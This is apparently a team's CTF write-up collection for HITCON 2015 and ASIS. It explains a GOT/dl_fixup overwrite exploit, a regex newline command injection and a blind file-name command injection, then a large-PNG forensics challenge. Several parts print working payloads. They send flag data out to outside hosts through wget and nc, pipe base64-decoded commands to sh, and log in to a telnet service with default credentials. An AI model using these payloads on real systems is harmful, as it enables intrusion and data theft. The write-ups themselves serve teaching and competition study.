This challenge was solved by and the write up was written by one of my teammates, akg.

Open any non-existing webpage, like this: https://ctf2015.hitcon.org/asd

Oh 404 not found
Ok, ok I know ... here is your flag: hitcon{do_you_wanna_play_a_game?enjoy_hitcon_ctf_2015_quals:)}

This challenge was solved by one of my teammates, @kutyacica and me and the write up was written by me.

This was a binary which read 1024 bytes from stdin into a BSS buffer, took the buffer’s first 8 bytes as an index into that buffer, and wrote \x10\x00\x00\x00\x00\x00\x00\x00 followed by bytes 8-16 of the buffer to that position.

As the index is signed, we could use negative numbers and write to addresses before the buffer, although only to 16-byte aligned addresses.

So we overwrote the GOT loading structures, which caused dl_fixup to overwrite arbitrary memory. As we did not know the address of system, we also had to make dl_fixup calculate it for us. Fortunately this was possible, as it executed an add instruction on some of our inputs. So we looked up __libc_start_main’s address (already in the GOT at 0x600B80) and added the difference to it (system - __libc_start_main = 0x46640 - 0x21dd0 = 0x24870).

As stdin, stdout and stderr were closed, we used a simple wget callback to our server: http://cuby.hu/x/\$(cat flag|base64).

The exploit was:

while true; do python -c "from pwn import *; bufStart=0x600bd0; where1=p64(0x24870); \
where2='X'*8; what='B'*8; yval=p64(0x600B80-8); y=p64(bufStart+8*8); rdi=p64(bufStart+400); \
payload='\x80'+'\xff'*7 + p64(bufStart) + where1 + rdi + where2 + p64(7) + yval*9 + \
p64(bufStart) + y + p64(0x42)*16 + p64(bufStart+248) + p64(bufStart-8) + p64(bufStart+272) + \
'A'*4 + '\x0a\x03\xFF\xFF' + what + p64(0x43)*13 + 'A'*8 + \
'wget http://cuby.hu/x/\$(cat flag|base64);sleep 10;'; \
print payload+cyclic(1024-len(payload))"|nc 52.68.211.239 10000; sleep 0.1; done

This challenge was solved by one of my teammates, nguyen and me and the write up was written by me.

Run this on one thread:

while true; do wget -qO- "http://52.68.245.164/?args[]=abc%0a&args[]=twistd&args[]=telnet" > /dev/null; done

This works because $ in a regex also matches just before a trailing \n (\Z would not allow this), so the server ends up running the following two commands:

/bin/orange abc
twistd telnet
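As an added example (not part of the original write-up or the challenge code), the Python regex behaviour the bypass relies on, shown from the validator’s side: an allow-list anchored with ^...$ still accepts an argument that ends in a newline, while \Z or re.fullmatch rejects it. The allow-list pattern and the argument list are constructed for illustration.

```python
import re

# Constructed allow-list: an argument is supposed to be a single lowercase word.
DOLLAR_RE = re.compile(r"^[a-z]+$")    # '$' also matches right before a final '\n'
STRICT_RE = re.compile(r"^[a-z]+\Z")   # '\Z' matches only at the true end of the string


def passes_dollar(arg):
    """Validation with '$': lets 'abc\\n' through."""
    return DOLLAR_RE.match(arg) is not None


def passes_strict(arg):
    """Validation with '\\Z': rejects any trailing newline."""
    return STRICT_RE.match(arg) is not None


def passes_fullmatch(arg):
    """re.fullmatch anchors both ends itself, so no '$' pitfall."""
    return re.fullmatch(r"[a-z]+", arg) is not None


def lines_after_validation(args, check):
    """Simulate building one command line from the accepted arguments.
    Every newline that survives `check` splits the line into a second command,
    which is exactly what the write-up describes for args[]=abc%0a."""
    accepted = [a for a in args if check(a)]
    command = "/bin/orange " + " ".join(accepted)
    return [line.strip() for line in command.split("\n")]


if __name__ == "__main__":
    args = ["abc\n", "twistd", "telnet"]
    print(lines_after_validation(args, passes_dollar))   # two commands
    print(lines_after_validation(args, passes_strict))   # one command
```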

Connect on another thread with nc 52.68.245.164 4040 (the port of the twistd telnet service), log in with user/pass admin/changeme (the default credentials) and execute this until you get the flag: import os;print os.popen("/read_flag").read();

python -c "import sys;sys.stdout.write(\"admin\r\nchangeme\r\nimport os;\
print '%r'%os.popen('/read_flag').read();\r\n\")"|nc 52.68.245.164 4040

Sometimes you have to try it multiple times, because the process is killed very fast.

This challenge was solved by and the write up was written by my teammates, nguyen and akg.

Through testing we found that it was a blind command injection in the filename of a file upload.

Set up a host listening on a port and inject a command, e.g.: filename.txt; ls |nc ip port

To copy the source we used find .. -iname '*gz'|xargs cat|nc ip port; after analyzing it, we had the exploit:

~  echo "cat /home/asis/flag.txt | nc ip port" | base64
<base64string>
~ a.txt| echo <base64string> | base64 -d | sh
ASIS{72a126946e40f67a04d926dd4786ff15}

We got a PNG file with a size of 15MB.

You cannot open the file: some programs simply freeze, others show out-of-memory exceptions or other errors.

Loading it into Wireshark, for example, shows the file’s basic information, like its width and height.


It is a very huge file, which explains why we could not open it earlier.

We have to make some educated guesses. Looking into the file contents, you can see that the IDAT part of the file is full of zeros:


So I used one of my helper methods, which gave me a quick summary of the contents of the file:

\x89PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0d
IHDR\x00\x05C\x9b\x00\x05C\x9b\x01\x03\x00\x00\x00\xa5\xa5\x12\xb1\x00\x00\x00\x06
[email protected]\x00\xe0\xe0\[email protected]\xa3~c\xab\x00\xdb\xfd\xf1
IDATx\xda\xec\xc1\x01\x0d\x00\x00\x00\xc2\xa0\xf7Om\x0f\x07\x04\x0c
<7207787x00>
\xbc\x19\x00\x00\x00\xff\xff...\xa0\xf7Om\x10\x81\x0c
<7207829x00>
\xe0\xd5\x00\x00\x00\xff\xff\x01\x00\x00\xff\xffn\x1f\xdb\x89\x8e.\xf3\xe9\x00\x00\x00\x00
IEND\xaeB`\x82

The IDAT chunk contains zlib-compressed data (the only compression method PNG supports), so there is some information in the middle of the file.

As the file’s bit depth is 1, each byte holds 8 pixels, so the uncompressed raw bitmap data is 344987 * (344987 // 8 + 1) = ~15 GB.

As I did not want to decompress this much data to my hard disk, I wrote a C# script to seek into the middle of the image data (to about 7.4GB), read the middle of the file and extract a few MB of raw data.

I created a summary of this too:

<2154200x00>\xf1\xfc...36 bytes...\xcf\x0a
<43085x00>\xf1\xf9\x8...\xe7\x0a
<43085x00>\xf5\xf3\xef...\xcf\x0a
[...10 times again...]
<2154300x00>

What we see is 40 bytes of data in the middle of every row. So I simply recovered these bits with the following code snippet:

// One scanline: ceil(344987 / 8) bytes of 1-bit pixels plus one PNG filter-type byte.
long strideLen = 344987 / 8 + 1 + 1;
// Take the 40 non-zero bytes found at offset 21542 in each of 16 consecutive rows.
for (int i = 0; i < 16; i++)
    rows.Add(Conversion.BytesToHex(png2.Skip(baseOffset + i * (int)strideLen + 21542).Take(40).ToArray()));

And converted the bytes to bits, i.e. pixels in this case (with my web-based conversion toolset hosted at https://kt.pe/tools.html), and replaced the “1” characters with spaces “ ” to make it more readable:
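As an added example (not the author’s C# script or web tool), the same geometry calculation and bit-to-text rendering in Python: it parses the IHDR bytes from the dump above, derives the stride and the ~15 GB raw size, computes where a given column sits in consecutive scanlines, and renders packed 1-bit pixels the way the write-up did. The column offset 21542 is the write-up’s value; the function names are mine.

```python
import struct

# Constructed sample: the PNG signature and IHDR chunk exactly as dumped above
# (width 0x05439b = 344987, height 344987, bit depth 1, colour type 3 = indexed).
PNG_HEAD = (b"\x89PNG\r\n\x1a\n"
            b"\x00\x00\x00\x0dIHDR"
            b"\x00\x05C\x9b\x00\x05C\x9b\x01\x03\x00\x00\x00"
            b"\xa5\xa5\x12\xb1")

# Channels per pixel for each PNG colour type (0 grey, 2 RGB, 3 palette, 4 grey+A, 6 RGBA).
CHANNELS = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}


def parse_ihdr(data):
    """Parse the signature and IHDR, returning the geometry plus the derived
    scanline stride and the size of the fully decompressed pixel data."""
    if data[:8] != b"\x89PNG\r\n\x1a\n":
        raise ValueError("not a PNG file")
    length, ctype = struct.unpack(">I4s", data[8:16])
    if ctype != b"IHDR" or length != 13:
        raise ValueError("IHDR must be the first chunk and 13 bytes long")
    width, height, depth, colour, _comp, _filt, _inter = struct.unpack(">IIBBBBB", data[16:29])
    # Each scanline is ceil(width * bits_per_pixel / 8) bytes plus one filter-type byte.
    stride = (width * depth * CHANNELS[colour] + 7) // 8 + 1
    return {"width": width, "height": height, "bit_depth": depth,
            "colour_type": colour, "stride": stride, "raw_size": stride * height}


def row_offsets(stride, column_byte, row_count, first_row=0):
    """Offsets of pixel byte `column_byte` in `row_count` consecutive scanlines of
    the decompressed stream; the +1 skips each row's filter-type byte."""
    return [(first_row + r) * stride + 1 + column_byte for r in range(row_count)]


def render_row(raw):
    """Unpack 1-bit pixels, most significant bit first, and render them as the
    write-up did: a set bit becomes a space, a clear bit becomes '0'."""
    return "".join(" " if (b >> (7 - i)) & 1 else "0" for b in raw for i in range(8))


if __name__ == "__main__":
    info = parse_ihdr(PNG_HEAD)
    print(info)                                   # stride 43125 -> raw_size ~14.9 GB
    print(row_offsets(info["stride"], 21542, 3))  # the 40-byte column in 3 rows
    print(render_row(b"\xc3\x18"))
```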

....000       00000     0    00000      0             000     0000        00    00   000               000      000    0              0    000     000000      00                     0000      000      000     00           000000        0      00       00     000        00    00   000     0000     0000        00  00    
    000      00  000    0   00  000    0            000 00   00  00       00   00  000 00             00 00    00 00   0              0  000 00    0           00                    00  00    00 00   000 00   00            0             0      00       00    00 00       00   00   00 00   00  00   00  00       00   00   
    0 0     00     0    0  00     0    0            00   00  0    00     000   00  00   00           00   00  00   00  0              0  00   00  00          000                    0    00  00   00  00   00  00           00             0     000      000   00   00     000   00  00   00  0    00  0    00     000    0   
   00 00    00     0    0  00     0    0     000    00   00  0    00    0000  0000 00   00   00000   0        0    00  0 000     0000 0  00   00  00         0000    0000    00000   0     0  0    00  0     0 0000  00000   00        0000 0    0000     0000   0          0000  0000 0    00  0    00  0     0    0000    0   
   0  00    000         0  000         0    00 00   00   0        0     0 00   00  00   0   000 00   0 000    0     0  000 000  00  000  00   0   00000      0 00   00  00  000 00   0    00  0     0       00  00  000 00   00000    00  000    0 00     0 00   0 000      0 00   00  0     0       0   0    00    0 00    0   
   0   0     00000      0   00000      0   00   00   00000      000    0  00   00   00000   0    00  000 00   0     0  00   00  0    00   00000   00  00    0  00   0    0  0    00  00   00  0     0       00  00  0    00  00  00   0    00   0  00    0  00   000 00    0  00   00  0     0     000   00   00   0  00    0   
  00   00       0000    0      0000    0   0     0  00   00       00  00  00   00  00   00       00  00   00  0     0  0     0  0    00  00   00       00  00  00   0            00   000000  0     0     000   00       00       00  0    00  00  00   00  00   00   00  00  00   00  0     0       00   000000  00  00    0   
  0000000          00   0         00  00   0000000  0     0       00  0   00   00  0     0   000000  0     0  0     0  0     0 00     0  0     0        0  0   00   0        000000        0  0     0    00     00   000000        0 00     0  0   00   0   00   0     0  0   00   00  0     0       00        0  0   00    00  
 00     0   0      00   0  0      00  0    0        0     0  0     0 00000000  00  0     0  00   00  0     0  0    00  0     0  0    00  0     0        0 00000000  0       00   00       00  0    00   00      00  00   00        0  0    00 00000000 00000000  0     0 00000000  00  0    00  0     0       00 00000000   00  
 00     00  00     00   0  00     00   0   0     0  0    00  0    00      00   00  0    00  0    00  00   00  00   00  00   00  0    00  0    00  0    00      00   0    0  0    00  00   0   00   00  00       00  0    00  0    00  0    00      00       00   00   00      00   00  00   00  0    00  00   0       00    0   
 0      00   000  00    0   000  00    0    00 00   000 00   00  00       00   00  000 00   00  000   00 00    00 00   000 00   000 000  000 00   00  00       00   00  00  00  000  00  00    00 00   00       00  00  000  00  00   000 000      00       00    00 00       00   00   00 00   00  00   00  00       00    0   
00       0    00000     0    00000     0     000     0000     0000        00   00   0000     000  00   000      000    0 000     0000 0   0000     0000        00    0000    000  00  0000      000    0000000  00   000  00  0000     0000 0      00       00     000        00   00    000     0000     0000        00    0   

The flag was:

ASIS{e834f8a60bd854ca902fa5d4464f0394}